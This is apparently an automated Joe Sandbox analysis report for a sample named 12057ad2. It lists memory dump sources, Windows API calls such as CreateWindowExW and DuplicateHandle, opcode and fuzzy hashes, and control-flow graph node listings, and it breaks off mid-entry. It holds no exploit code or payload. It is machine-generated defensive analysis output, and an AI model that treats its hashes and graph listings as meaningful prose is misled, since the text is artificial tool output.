                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: 1830cbebde1c2d87dc62887cde93e5381d5d709e160c2f101c6f354aa182c6cd
                                                • Instruction ID: 73fae78a0f3cab56100f38543c57bc846cb24157a396293786a5d1d07d14de1b
                                                • Opcode Fuzzy Hash: 1830cbebde1c2d87dc62887cde93e5381d5d709e160c2f101c6f354aa182c6cd
                                                • Instruction Fuzzy Hash: 5B1107B1C002499FDB10CF9AD884BDEFBF8FB48324F04842AE555A3640C378A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9329,00000800,00000000,00000000), ref: 009D953A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: aa516489e99556d7e7e1b04f957bab371c8238165cf1fc04aaf2d6eee14f02f7
                                                • Instruction ID: b738da16231fdb5940268dc5306a07324cfb0d1a1fd81630946a42398bb66ce8
                                                • Opcode Fuzzy Hash: aa516489e99556d7e7e1b04f957bab371c8238165cf1fc04aaf2d6eee14f02f7
                                                • Instruction Fuzzy Hash: 1C11F2B29002099FCB10DF9AD444BDEFBF4AF88314F15842AE915A7600C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 06CE141D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: d2ca735c5787c263eb2df0034961e14e04f8d0beec5026c21871826ec28b9615
                                                • Instruction ID: 014c4b314d2f902a936473eeb9f7362f4bd4f4128fb191a5fd2f03929a88e644
                                                • Opcode Fuzzy Hash: d2ca735c5787c263eb2df0034961e14e04f8d0beec5026c21871826ec28b9615
                                                • Instruction Fuzzy Hash: 8B1107B1D003499FDB10CF9AD844BDEFBF8EB48324F04842AE515A3600C378A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06ACA985
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: cf944366239980cb8646afc2ff99858b124ea6e0f700c3c8994f9828a13e5aab
                                                • Instruction ID: 11191814ae46724425e14efd2066f4b66c96b3fe244557763cf3cffde6fe90f8
                                                • Opcode Fuzzy Hash: cf944366239980cb8646afc2ff99858b124ea6e0f700c3c8994f9828a13e5aab
                                                • Instruction Fuzzy Hash: D31125B28002499FDB10CF99C885BEFFBF8EF48324F14845AE555A7601C379A984CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 009D77CD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 926a53eadc740680583cc611771fe906b9ed66f96d0e0aec94473cbc49994b69
                                                • Instruction ID: bbcef9a8203a83520930b36f9c60c5beab086971f76665b4bdb73e49a749e053
                                                • Opcode Fuzzy Hash: 926a53eadc740680583cc611771fe906b9ed66f96d0e0aec94473cbc49994b69
                                                • Instruction Fuzzy Hash: 3D119AB1C043998FDB10CF99D4087EABFF8EB05314F54886ED455A3241D7B9AA48CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06ACA985
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 483efec1efd6b2b06814e091baa15fc573a83262196ac1cf0c08e49f2bdc0f9c
                                                • Instruction ID: 0efbf1882eaf5e1e3cb62b0731d4eb9b9098fde1f8b8d3f4eaf059b58dd7128f
                                                • Opcode Fuzzy Hash: 483efec1efd6b2b06814e091baa15fc573a83262196ac1cf0c08e49f2bdc0f9c
                                                • Instruction Fuzzy Hash: BC1118B18003499FDB10CF9AC845BEEFBF8EF58324F148419E554A3640D379A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 009D92AE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: e4e6e655b803e452596908decd808d0cf5f148414d0dcb8cfa841b0242ac1e0d
                                                • Instruction ID: 2ccc35a0c7d62c8aabf01fb478d7a7a2636d932853d59c23b1bde38ee7c9baee
                                                • Opcode Fuzzy Hash: e4e6e655b803e452596908decd808d0cf5f148414d0dcb8cfa841b0242ac1e0d
                                                • Instruction Fuzzy Hash: 4411F0B5C002499BCB20CF9AC444BDEFBF8AB88324F14842AD529A7200C375A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: 4623a1835f217659de56fda47755d1268f003d323a3a05401da793c1449674d4
                                                • Instruction ID: 3253c0fa344d67044206c0bb4145ce756563f18896e3683793e8107cbf4a9ca2
                                                • Opcode Fuzzy Hash: 4623a1835f217659de56fda47755d1268f003d323a3a05401da793c1449674d4
                                                • Instruction Fuzzy Hash: B811F2B5D002498FCB10DF9AD488BDEFBF4EF48324F14856AE419A3600D3786645CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06AC625D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 9f3f68c4b6051882eaa1728f731de79f9aea7a40fa434bea1d49da67784b0920
                                                • Instruction ID: 4e2979ca53274d510d3862f9e45de659f3d885b220fe5a741c15a299db1ee1fa
                                                • Opcode Fuzzy Hash: 9f3f68c4b6051882eaa1728f731de79f9aea7a40fa434bea1d49da67784b0920
                                                • Instruction Fuzzy Hash: E711E5B5C003499FDB20DF99D884BDEFBF8EB58324F14845AE515A7200C375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06AC625D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c151b3e38bc02b558f9b5bc7d819bbaef3cfc0f6f11c59a41017c8cc7654e72c
                                                • Instruction ID: 48c7a4433d8afbb83fcfd29e3b8b7ff064e588f907b07c172fb8a706a1b456bb
                                                • Opcode Fuzzy Hash: c151b3e38bc02b558f9b5bc7d819bbaef3cfc0f6f11c59a41017c8cc7654e72c
                                                • Instruction Fuzzy Hash: D211D3B5C002499FDB20DF99D884BDEBBF8EB58324F14845AE519A7200C375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: bf4d1c4c939c24795c904eadbbb6a3ee813887d35e9bfbcf071e7c7e01cb8e8c
                                                • Instruction ID: f3a8d0d1aefd0b01ef8d2054fdfb8ec03d3a2b5f913313a7ea4c584bee7818e3
                                                • Opcode Fuzzy Hash: bf4d1c4c939c24795c904eadbbb6a3ee813887d35e9bfbcf071e7c7e01cb8e8c
                                                • Instruction Fuzzy Hash: D511E2B5D046499FCB20DF9AD844BDEFBF4EF48324F14852AE419A3600D378A645CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 06CE141D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: aa44d640adc9b9db3281d2bb24a21e11cd769ab8d36fe4f0c037b632e317f8dd
                                                • Instruction ID: 7e7cb64900f7980834abe74df66ce85875dcf1794f75706265be896316418680
                                                • Opcode Fuzzy Hash: aa44d640adc9b9db3281d2bb24a21e11cd769ab8d36fe4f0c037b632e317f8dd
                                                • Instruction Fuzzy Hash: A4F05973D0A3848ED721A725D8043DEBBE49F61265F1AC4ABC194C36A3E3389149DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.571968067.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_61d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc5434ed8943bf9a9f1490623a7da57deacecbf577486b7168105cb5fc7eccf1
                                                • Instruction ID: 80df28a5b46892f3a188a2102fae99af280362162cf45d7b8374e5b71e9561a8
                                                • Opcode Fuzzy Hash: fc5434ed8943bf9a9f1490623a7da57deacecbf577486b7168105cb5fc7eccf1
                                                • Instruction Fuzzy Hash: 8C213D71504240DFDB14DF10D9C4FA6BBA6FB84324F28C56DD9054B346C336E896C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 571ceca1bd421d1eccf9650c6ead679b861cd1fc0fb770129e74e2217bc8a277
                                                • Instruction ID: 3bef52e497b88966d9a083b3f6f1f07b1fffd80d208a5b3487d751b31b8b0887
                                                • Opcode Fuzzy Hash: 571ceca1bd421d1eccf9650c6ead679b861cd1fc0fb770129e74e2217bc8a277
                                                • Instruction Fuzzy Hash: FE2107B1604204DFDB25CF50D9C4F26BBA5FB88328F24C66DE9894B242C37ADC46CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 402a02647e19cb3a3a11452e14b4a3fcebfcf5d4d3c2909cc108e455123061b9
                                                • Instruction ID: 4cc81c138aa056da437b3bd33f3aedafa84b9df43ce6c00d93108b44cc4f33df
                                                • Opcode Fuzzy Hash: 402a02647e19cb3a3a11452e14b4a3fcebfcf5d4d3c2909cc108e455123061b9
                                                • Instruction Fuzzy Hash: 2B2107B5608244DFDB24CF10D9C4B26BB65FB88314F24C66DD9894B256C33EDC47CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.571968067.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_61d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction ID: 4ff3ddba85d8c7558ccce94f2dd2074229c1a0b42a2d2b713c1f2fe2d7102e83
                                                • Opcode Fuzzy Hash: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction Fuzzy Hash: 8011B476504280DFCB15CF10D5C4B96BFB2FB94324F28C6A9D8050B616C336D856CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction ID: 73d7ca987a03134952938cba126af7e558fd32d665822d5de67c1594e520f2a1
                                                • Opcode Fuzzy Hash: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction Fuzzy Hash: B6118B75504280DFCB25CF14D5D4B15BBA1FB88324F28C6AAD8494B666C33AD84ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction ID: f056812d2ab3141ad0ac53d235d7f303e85e672232b15dea9f0f2581f4316c86
                                                • Opcode Fuzzy Hash: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction Fuzzy Hash: FB119D75904280DFCB21CF10D5C4B15FBB1FB84324F28C6ADD8894B656C37AD84ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage: 13.4%
                                                Dynamic/Decrypted Code Coverage: 100%
                                                Signature Coverage: 0%
                                                Total number of Nodes: 334
                                                Total number of Limit Nodes: 21

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 228 dff420-dff422 229 dff426-dff432 228->229 230 dff424 228->230 231 dff434-dff462 229->231 230->229 232 dff466-dff482 231->232 233 dff464 231->233 234 dff486-dff48a 232->234 235 dff484 232->235 233->232 236 dff48e-dff4a2 234->236 237 dff48c 234->237 235->234 238 dff4a6-dff4aa 236->238 239 dff4a4 236->239 237->231 237->236 240 dff4ae-dff4c2 238->240 241 dff4ac 238->241 239->238 242 dff4c6-dff4ca 240->242 243 dff4c4 240->243 241->240 244 dff4ce-dff4e2 242->244 245 dff4cc-dff4cd 242->245 243->242 246 dff4e6-dff4ea 244->246 247 dff4e4 244->247 245->244 248 dff4ee-dff502 246->248 249 dff4ec 246->249 247->246 250 dff506-dff50a 248->250 251 dff504 248->251 249->248 252 dff50e-dff522 250->252 253 dff50b-dff50d 250->253 251->250 254 dff526-dff52f 252->254 255 dff524 252->255 253->252 256 dff565-dff572 254->256 257 dff531-dff558 call dfd33c 254->257 255->254 259 dff576 256->259 260 dff574 256->260 261 dff55d-dff55e 257->261 262 dff57c-dff5de 259->262 263 dff578-dff57b 259->263 260->259 264 dff5e9-dff5f0 262->264 265 dff5e0-dff5e6 262->265 263->262 266 dff5fb-dff69a CreateWindowExW 264->266 267 dff5f2-dff5f8 264->267 265->264 269 dff69c-dff6a2 266->269 270 dff6a3-dff6db 266->270 267->266 269->270 274 dff6dd-dff6e0 270->274 275 dff6e8 270->275 274->275 276 dff6e9 275->276 276->276
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba0be97d743dadf86c1fc98e5767d87cb7067561ba74b6c08392ec1c62916749
                                                • Instruction ID: 27b7ac36d478703e0285602280f6538e140df644424b8abe1a714852a0e882db
                                                • Opcode Fuzzy Hash: ba0be97d743dadf86c1fc98e5767d87cb7067561ba74b6c08392ec1c62916749
                                                • Instruction Fuzzy Hash: D3A18071C0938D9FCF06CFA5D8509EDBFB1EF1A310F1A81AAE544AB262D7305845CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 277 df9068-df9070 278 df907b-df907d 277->278 279 df9076 call df7bf8 277->279 280 df907f 278->280 281 df9093-df9097 278->281 279->278 335 df9085 call df92f0 280->335 336 df9085 call df92e0 280->336 282 df90ab-df90ec 281->282 283 df9099-df90a3 281->283 288 df90ee-df90f6 282->288 289 df90f9-df9107 282->289 283->282 284 df908b-df908d 284->281 286 df91c8-df9242 284->286 325 df9246-df9288 286->325 326 df9244 286->326 288->289 290 df912b-df912d 289->290 291 df9109-df910e 289->291 293 df9130-df9137 290->293 294 df9119 291->294 295 df9110-df9117 call df7c04 291->295 298 df9139-df9141 293->298 299 df9144-df914b 293->299 296 df911b-df9129 294->296 295->296 296->293 298->299 302 df914d-df9155 299->302 303 df9158-df9161 call df8c54 299->303 302->303 307 df916e-df9173 303->307 308 df9163-df916b 303->308 310 df9175-df917c 307->310 311 df9191-df9195 307->311 308->307 310->311 313 df917e-df918e call df8c64 call df8c74 310->313 333 df9198 call df95e8 311->333 334 df9198 call df95c0 311->334 313->311 315 df919b-df919e 318 df91c1-df91c7 315->318 319 df91a0-df91be 315->319 319->318 328 df928a-df928d 325->328 329 df9290-df92bb GetModuleHandleW 325->329 326->325 328->329 330 df92bd-df92c3 329->330 331 df92c4-df92d8 329->331 330->331 333->315 334->315 335->284 336->284
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00DF92AE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 904056f1896cc518521934c3b9bdf84712ff3d0ff5aa6fe4749eccf2e05e6a89
                                                • Instruction ID: d1787089335e9568b1d5d5da06e3ce0d0bd1ace44818f9a486dba960f8f119e0
                                                • Opcode Fuzzy Hash: 904056f1896cc518521934c3b9bdf84712ff3d0ff5aa6fe4749eccf2e05e6a89
                                                • Instruction Fuzzy Hash: 44713270A00B099FDB24DF2AD4547AAB7F1FF88304F05892DD68AC7A50DB34E8458BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 337 dfd320-dfd32a 339 dfd32c-dfd32e 337->339 340 dfd330-dff5de 337->340 339->340 345 dff5e9-dff5f0 340->345 346 dff5e0-dff5e6 340->346 347 dff5fb-dff633 345->347 348 dff5f2-dff5f8 345->348 346->345 349 dff63b-dff69a CreateWindowExW 347->349 348->347 350 dff69c-dff6a2 349->350 351 dff6a3-dff6db 349->351 350->351 355 dff6dd-dff6e0 351->355 356 dff6e8 351->356 355->356 357 dff6e9 356->357 357->357
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DFF68A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 7897fe3868b99e61a1d4531845dcc2cd9d863b315c893e7aeeaa767df1988ea7
                                                • Instruction ID: 5ff432872f667f4e615b15c384a4d74838edf8aee92db3353900c6becc1ee825
                                                • Opcode Fuzzy Hash: 7897fe3868b99e61a1d4531845dcc2cd9d863b315c893e7aeeaa767df1988ea7
                                                • Instruction Fuzzy Hash: 395101B1C04349AFDB15CFA9C880ADEBFB1BF49314F25816AE509AB221D7709845CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 358 dff56c-dff5de 360 dff5e9-dff5f0 358->360 361 dff5e0-dff5e6 358->361 362 dff5fb-dff633 360->362 363 dff5f2-dff5f8 360->363 361->360 364 dff63b-dff69a CreateWindowExW 362->364 363->362 365 dff69c-dff6a2 364->365 366 dff6a3-dff6db 364->366 365->366 370 dff6dd-dff6e0 366->370 371 dff6e8 366->371 370->371 372 dff6e9 371->372 372->372
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DFF68A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 35d3609eafabd3755beaf40a1504c3a9db9ac9a9389728b4853a8dacd5e6a593
                                                • Instruction ID: ab60191484f471687e65fee0c97210e50f6649ab335d76f09504e8532663e3e6
                                                • Opcode Fuzzy Hash: 35d3609eafabd3755beaf40a1504c3a9db9ac9a9389728b4853a8dacd5e6a593
                                                • Instruction Fuzzy Hash: 1451DFB1D00309AFDB14CFAAC884ADEBBB5BF48314F25812AE919AB210D7759945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 373 dfd33c-dff5de 376 dff5e9-dff5f0 373->376 377 dff5e0-dff5e6 373->377 378 dff5fb-dff69a CreateWindowExW 376->378 379 dff5f2-dff5f8 376->379 377->376 381 dff69c-dff6a2 378->381 382 dff6a3-dff6db 378->382 379->378 381->382 386 dff6dd-dff6e0 382->386 387 dff6e8 382->387 386->387 388 dff6e9 387->388 388->388
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DFF68A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: ef694ee064a4ace76e52c0816f5e62a048de51640bca35c5e04141effcf22231
                                                • Instruction ID: 31afce05873970e2ee6fa6e8afb2ecc37102bfed228f4be5bbb9d9cdb527ba2e
                                                • Opcode Fuzzy Hash: ef694ee064a4ace76e52c0816f5e62a048de51640bca35c5e04141effcf22231
                                                • Instruction Fuzzy Hash: 2351C0B1D00309AFDB14CF99C884ADEBBB5BF48314F25812AE519AB210D775A945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 389 df76e8-df76ea 390 df76ee-df76f1 389->390 391 df76ec 389->391 392 df7764-df77b4 390->392 393 df76f3-df7702 390->393 391->390 398 df77b6-df77de KiUserCallbackDispatcher 392->398 399 df7802-df781b 392->399 394 df7704 393->394 395 df7750-df7751 393->395 411 df7704 call df76e8 394->411 412 df7704 call df7758 394->412 413 df7704 call df7768 394->413 397 df770a-df771e 400 df7749 397->400 401 df7720-df7733 call df689c 397->401 402 df77e7-df77fb 398->402 403 df77e0-df77e6 398->403 400->395 401->400 407 df7735-df7742 call df4e28 401->407 402->399 403->402 407->400 410 df7744 407->410 410->400 411->397 412->397 413->397
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01b821514c02d544494fc90625f2336a11b4880a8c0f8413f9489691d77909f9
                                                • Instruction ID: 244c7989fbe6dfdea168f132e6d133e299e80b31ef2018317bc785be6da5e39c
                                                • Opcode Fuzzy Hash: 01b821514c02d544494fc90625f2336a11b4880a8c0f8413f9489691d77909f9
                                                • Instruction Fuzzy Hash: 4C31E170904388CEDB11DF65E4483EA7FF4EB05318F09849ED546AB242C738AA85CB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 414 df9020-dfb30c DuplicateHandle 416 dfb30e-dfb314 414->416 417 dfb315-dfb332 414->417 416->417
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DFB23E,?,?,?,?,?), ref: 00DFB2FF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: a1873e51a5c5383262f8e75c01970ace8dd54ee0f4b1eba4b69992832f6ca199
                                                • Instruction ID: 93acd37b9d7fe9c47f39bd1b97f614b848b286c072f32271e8264d264ef70398
                                                • Opcode Fuzzy Hash: a1873e51a5c5383262f8e75c01970ace8dd54ee0f4b1eba4b69992832f6ca199
                                                • Instruction Fuzzy Hash: D621E5B5900208AFDB10CF99D884BEEFBF4FB48324F15845AE955A7310D374A954CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 • Control-flow Graph (basic blocks and edges): 420 dfb270-dfb272 421 dfb276-dfb30c DuplicateHandle 420->421 422 dfb274 420->422 423 dfb30e-dfb314 421->423 424 dfb315-dfb332 421->424 422->421 423->424
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DFB23E,?,?,?,?,?), ref: 00DFB2FF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
